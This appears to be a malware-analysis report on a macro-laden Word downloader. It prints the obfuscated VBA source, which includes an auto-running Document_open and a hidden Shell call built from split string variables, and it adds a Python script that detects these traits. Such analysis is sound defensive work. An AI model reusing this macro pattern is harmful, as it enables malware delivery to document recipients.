Verdict: MALICIOUS
Risk score: 182
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_open procedure, the entry point Word runs automatically when the document is opened (T1059.005); delivery as an e-mail attachment is the assumed infection vector (T1566.001). Inside Document_open the macro calls VBA.Shell with a command string assembled at run time from nine string variables plus the literal "C" (CVar("C")), and passes window style 0 (vbHide), so the spawned process has no visible window. Splitting the command across variables keeps it out of any single string literal, which is what defeats simple signature matching; the variable assignments are not in the visible preview, so the exact command is not recoverable from this page. The surrounding procedures are junk code: comparisons, multiplications and long loops over variables that are never assigned, run under On Error Resume Next so any runtime error is swallowed. The ClamAV signature Doc.Malware.Valyria-6989445-0 corroborates the verdict. The analyzer's assessment is that this is a downloader stage, with the hidden Shell command fetching and executing a second-stage payload.
Heuristics (5)

| Heuristic | Severity | ID | Detail |
|---|---|---|---|
| ClamAV: Doc.Malware.Valyria-6989445-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Valyria-6989445-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (2 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI present in ordinary Office documents, not a contacted host; it carries no weight in the verdict.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25218 bytes | 036e8c13853aaeb244d069d2469e893be2ee1a95ebe67fa07a23d0df844c8a44 |
Preview script (first 1,000 lines of the extracted script, shown as carved)
Attribute VB_Name = "hzqoUrQTfEOO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function rjDMdTWbjwIsI()
On Error Resume Next
If PoXtj Xor zVwMz Then
zTTfz = 134100329
End If
If djYPSS Xor aftIUZ Then
zXJji = 134100329
End If
If SPczw Xor hWjlb Then
OsXiT = 134100329
End If
If rKHzjz Xor IPRLV Then
qbrYF = 134100329
End If
If lUbnsX Xor zvJwPW Then
lVQQl = 134100329
End If
End Function
Private Function ZDNfTBnRmYIi()
On Error Resume Next
If qSQqjc Xor zpjSW Then
SbFEV = 134100329
End If
If aNdMw Xor UphTmT Then
YzvFXF = 134100329
End If
If GSdnq Xor JiOcfK Then
qdszW = 134100329
End If
If iMDTLo Xor JzkEjV Then
TvAZF = 134100329
End If
If QrWKSi Xor UtXGfj Then
Itqcp = 134100329
End If
End Function
Private Function ZNGSwzA()
On Error Resume Next
If qukql Xor jlfvOK Then
MzLGS = 134100329
End If
If aIUFM Xor EzqtN Then
dOYXH = 134100329
End If
If OnwIb Xor wFJKB Then
IbRGcH = 134100329
End If
If lCGcPM Xor fkwcc Then
RnLXu = 134100329
End If
If ZSjdO Xor jwwhvo Then
dqSdAs = 134100329
End If
If Nvopu Xor oMIvP Then
FzvDT = 134100329
End If
End Function
Private Sub Document_open()
On Error Resume Next
If fAtJvq = PNFHCq Then
VWXIAw = ITSti * 102768365
End If
If pMbksN = pjUwi Then
Alajw = HorPAI * 102768365
End If
If zopTU = YcEDuu Then
LYlwbo = lmwcL * 102768365
End If
If jwjjk = hiTPk Then
Ajwjt = rTHjP * 102768365
End If
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr + BonnVRGw + tWEtX + uZruUPj + dYNsMHc + fUTKiDjEVNPnr, 0
If DNTYE = jVUhlJ Then
bDdjj = SLZEMP * 102768365
End If
If udIGI = UmUUSz Then
KmDpf = BTLbb * 102768365
End If
If uAAPml = pznEM Then
wzwcst = dSkfE * 102768365
End If
End Sub
Private Function BcPUKmRL()
On Error Resume Next
If ZGthW = rFpzY Then
WiAwY = XknzjA * 102768365
End If
If hvjUMf = KtVErO Then
zhzAjB = mmSTKF * 102768365
End If
If kiiYqW = EOaWj Then
GUOun = tNhFj * 102768365
End If
If uIQBC = dCfNFQ Then
mQtQs = DPMmL * 102768365
End If
If NHwaN = jnhHj Then
RaAGKN = VdoQc * 102768365
End If
End Function
Private Function SanpbjzMTYiN()
On Error Resume Next
If iWsCa = ZmaUAj Then
GjWZu = cMlqiD * 102768365
End If
If KiscXq = HJujq Then
mbXcJ = wwMAcT * 102768365
End If
If bbFpj = HYhzkv Then
TiFrD = ukFqZ * 102768365
End If
If jwiQIp = wGYpz Then
vHtWYQ = VnvHS * 102768365
End If
If LBlFjz = fhAEt Then
aLQtJ = fMkwwZ * 102768365
End If
End Function
Private Function QjDZuASz()
On Error Resume Next
If ildsRJ = nfRmoR Then
OnYUKo = okqQtj * 102768365
End If
If jDRoz = UqnQS Then
QIPMol = WsQXvb * 102768365
End If
If PvuXPF = cFkiJ Then
TzwXK = mijcT * 102768365
End If
If TPjVNd = vMjLhA Then
QdFszv = hmoED * 102768365
End If
If ZdGElr = slGvnj Then
KdjrX = uKiMh * 102768365
End If
End Function
Attribute VB_Name = "RWkfRXKkffYmW"
Private Function nESfuLiw()
On Error Resume Next
If cEJaZz = Wmdstw Then
For vIhnTc = 155 To 516331127
nAHOY = 21658 + uEDztO / (46281 * DsjdwS * 67395 * FuqfQ)
Next
Else
TtHBr = (DCLAml / hasAkS)
End If
If qQHTPD = vkNlu Then
For EjONfj = 155 To 516331127
pfiAK = 38586 + CJEloB / (45648 * OAWOZL * 56615 * zwlzN)
Next
Else
XVXKO = (KmHIvH / mjbws)
End If
If iMzCM = DHmMB Then
For wjEqJ = 155 To 516331127
SAqXC = 31756 + koKVD
... (truncated)
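The three macro heuristics in the report (OLE_VBA_MACROS, OLE_VBA_DOCOPEN, OLE_VBA_SHELL) can be reproduced over the carved macros.bas with a short static check. The Python below is an added example written for this page, not the analyzer's or oletools' own code. It walks decoded VBA source line by line, records which procedure each Shell call sits in, whether the window-style argument is 0 (vbHide), how many string-concatenation operators build the command, and which literal fragments survive. The input is a constructed excerpt modelled on the preview above, not the sample itself; the Helper procedure, the calc.exe call and the SHELL_IN_AUTOEXEC label are my own additions and not part of the report.

```python
"""Static triage of decoded VBA source for the signals the report flags above:
auto-exec entry points, Shell() calls, hidden window style, concatenated command."""
import hashlib
import re

# Constructed excerpt modelled on the preview above, not the sample itself. The
# string variables are unassigned, as in the preview, so the real command is not
# recoverable; Helper and calc.exe are made up to exercise the Shell(...) form.
SAMPLE_VBA = '''Attribute VB_Name = "hzqoUrQTfEOO"
Private Sub Document_open()
On Error Resume Next
' Shell "ignored": a comment line must not count as a call
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr, 0
End Sub
Private Function Helper()
x = Shell("calc.exe", 1)
End Function
'''

# Procedure names Office runs without user interaction.
AUTOEXEC = {"document_open", "autoopen", "auto_open", "workbook_open", "autoexec"}
PROC_RE = re.compile(r"^\s*(?:(?:private|public|friend)\s+)?(?:static\s+)?(?:sub|function)\s+(\w+)", re.I)
END_RE = re.compile(r"^\s*end\s+(?:sub|function)\b", re.I)
# The VBA Shell function, optionally qualified as VBA.Shell; \b excludes
# ShellExecute and the lookbehind excludes the string "WScript.Shell".
SHELL_RE = re.compile(r"(?<![\w.])(?:vba\.)?shell\b(.*)", re.I)
STRING_RE = re.compile(r'"((?:[^"]|"")*)"')


def split_args(args):
    """Split on commas outside strings/parentheses and count the top-level
    + and & operators per argument (many of them = command built from fragments)."""
    args = args.strip()
    if args.startswith("(") and args.endswith(")"):  # x = Shell(cmd, style) form
        args = args[1:-1]
    parts, cur, ops, depth, in_str = [], [], 0, 0, False
    for ch in args:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif depth == 0 and ch == ",":
                parts.append(("".join(cur).strip(), ops))
                cur, ops = [], 0
                continue
            elif depth == 0 and ch in "+&":
                ops += 1
        cur.append(ch)
    if cur:
        parts.append(("".join(cur).strip(), ops))
    return parts


def find_shell_calls(vba):
    """One record per Shell call, tagged with the procedure that contains it."""
    calls, current = [], None
    for lineno, line in enumerate(vba.splitlines(), 1):
        s = line.strip()
        if s.startswith("'") or s.lower().startswith("rem "):
            continue  # comment line
        proc = PROC_RE.match(line)
        if proc:
            current = proc.group(1)
            continue
        if END_RE.match(line):
            current = None
            continue
        m = SHELL_RE.search(line)
        if not m:
            continue
        args = split_args(m.group(1))
        cmd, ops = args[0] if args else ("", 0)
        style = args[1][0] if len(args) > 1 else ""
        calls.append({
            "line": lineno,
            "procedure": current,
            "hidden": style in ("0", "vbHide"),  # window style 0 hides the process window
            "concat_ops": ops,
            "literal_fragments": [f for f in STRING_RE.findall(cmd) if f],
        })
    return calls


def triage(vba):
    """Reproduce the report's macro heuristics over decoded VBA text."""
    procs = [m.group(1) for m in map(PROC_RE.match, vba.splitlines()) if m]
    autoexec = [p for p in procs if p.lower() in AUTOEXEC]
    shells = find_shell_calls(vba)
    findings = [tag for cond, tag in (
        (procs, "OLE_VBA_MACROS"),
        (autoexec, "OLE_VBA_DOCOPEN"),
        (shells, "OLE_VBA_SHELL"),
        # Hypothetical combined label, not one of the report's IDs: Shell reached from an auto-exec entry point.
        (any(c["procedure"] and c["procedure"].lower() in AUTOEXEC for c in shells), "SHELL_IN_AUTOEXEC"),
    ) if cond]
    return {
        "sha256": hashlib.sha256(vba.encode("utf-8")).hexdigest(),  # the report hashes the carved file bytes
        "procedures": procs,
        "autoexec": autoexec,
        "shell_calls": shells,
        "findings": findings,
    }
```

To run this against the real artifact, decode the macro source first (for example with `olevba <file>` from oletools, which is the same extraction the artifact table credits) and pass the text to triage(). The strongest single signal is a Shell call whose enclosing procedure is an auto-exec name and whose command has a high concat_ops count with almost no literal fragments, which is exactly the shape of the Document_open call in the preview.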